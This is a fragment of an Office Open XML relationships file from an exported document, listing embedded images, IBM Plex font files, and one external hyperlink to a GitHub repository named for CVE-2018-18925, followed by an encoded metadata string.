Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/j4k0m/CVE-2018-18925" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43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IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.ttf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/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2.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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4.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59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9PDTPWXFH+/603Ka7+aZByFqow==">CgMxLjAaIwoBMBIeChwIB0IYCgtSb2JvdG8gTW9ubxIJTm92YSBNb25vMg1oLjk5ejZtemh3ZHlvMg5oLjJqZGYzNmNrMWkwcDIOaC5xeGluNDg5OWg4aXkyDmgucnJkY3h3ODR1aDVvMg5oLjlheWszeDdoZGl5NDgAciExcFVxbnhVVktkc3FGSms5LV9VVk9iaGRMb0ZRaFZ0aXE=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